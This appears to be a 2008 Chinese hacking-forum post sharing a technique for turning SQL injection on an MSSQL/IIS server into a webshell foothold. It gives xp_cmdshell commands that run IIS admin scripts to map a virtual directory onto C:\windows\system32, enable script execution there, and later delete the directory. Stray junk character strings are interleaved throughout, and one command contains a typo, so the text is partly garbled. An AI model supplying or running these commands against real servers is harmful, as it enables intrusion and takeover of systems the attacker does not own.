|
- 帖子
- 120
- 积分
- 470
- 威望
- 636
- 金钱
- 101
- 在线时间
- 31 小时
   
|
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
% L) o) x" y. `1 L$ k4 e, s+ \/ l I+ C
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'
+ ?; w% i" o5 \( J9 j建立虚拟目录win,指向c:\windows\system32% s8 T8 X- Y# d" a6 ], T
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture', L" n" u: i7 L; i7 j+ |, |! W
让win句有解析asp脚本权限
9 m$ B( U% o7 W$ l
! J! G- I6 ~' ]" A& m2 b# u1 Eexec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"9 m2 z1 _4 r5 C+ {2 Y( @, I
删除虚拟目录。# }( g+ m1 P9 f3 v$ q
找不到web绝对路径的一种解决办法,4 i# D G$ z( t+ w! C; x& F
/ t2 _ t& d _- M403错误,表示虚拟目录建好了。。 |
-
1
评分人数
-
|
发表于 2008-10-22 14:38
| 
